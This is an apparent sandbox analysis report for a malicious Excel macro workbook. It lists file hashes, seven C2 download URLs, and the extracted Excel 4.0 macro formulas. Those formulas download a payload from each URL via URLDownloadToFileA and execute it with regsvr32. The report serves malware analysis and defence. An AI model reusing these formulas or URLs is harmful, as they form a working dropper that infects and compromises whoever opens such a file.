Overview

overview

10

Static

static

10

19963a72ee...8.xlsm

windows7-x64

10

19963a72ee...8.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    19963a72ee0a67d13ccde842336f3b6f4a3dfe1c905781b2279f538d1f8d8058

  • Size

    50KB

  • MD5

    2cdc95cffe61b54651fcbe51298f830e

  • SHA1

    6ecd6e865c0f367a2a17905e5f83d4f1d6b36463

  • SHA256

    19963a72ee0a67d13ccde842336f3b6f4a3dfe1c905781b2279f538d1f8d8058

  • SHA512

    f2500b6c3addf6180d6cd8579fa1bfe244ffa5fe5266a8198b18b747f4480c6f5e17a505c9995cdba908e241deb46e49b24c0ebe282c3d8d623a6a8e0444e052

  • SSDEEP

    768:mx9D9onkH+lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA0Zl:mXD9oencDSmSIBlGeuSEcm2h0BZl

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://actividades.laforetlanguages.com/wp-admin/WQNAwrWi77MV8a05fia/

http://consejosdeorlando.com/wp-includes/mMaIlj99Y1C1sYN/

http://aopda.org/wp-content/uploads/KXc3Agu18w/

http://agenciaml.com.br/wp-content/lMGfW5Wk09k/

http://advogadogoiania.com.br/wp-includes/VTz0V6D/

http://101.53.142.76/ApcCache/FiXQvn/

https://www.agenciaigual.com.br/Novo2017/yTZMu9FxcyHYFUkb/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/WQNAwrWi77MV8a05fia/","..\en.ocx",0,0) =IF('DEFGW'!G9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/mMaIlj99Y1C1sYN/","..\en.ocx",0,0)) =IF('DEFGW'!G11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/KXc3Agu18w/","..\en.ocx",0,0)) =IF('DEFGW'!G13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://agenciaml.com.br/wp-content/lMGfW5Wk09k/","..\en.ocx",0,0)) =IF('DEFGW'!G15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/VTz0V6D/","..\en.ocx",0,0)) =IF('DEFGW'!G17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://101.53.142.76/ApcCache/FiXQvn/","..\en.ocx",0,0)) =IF('DEFGW'!G19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.agenciaigual.com.br/Novo2017/yTZMu9FxcyHYFUkb/","..\en.ocx",0,0)) =IF('DEFGW'!G21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\en.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • 19963a72ee0a67d13ccde842336f3b6f4a3dfe1c905781b2279f538d1f8d8058
    .xlsm office2007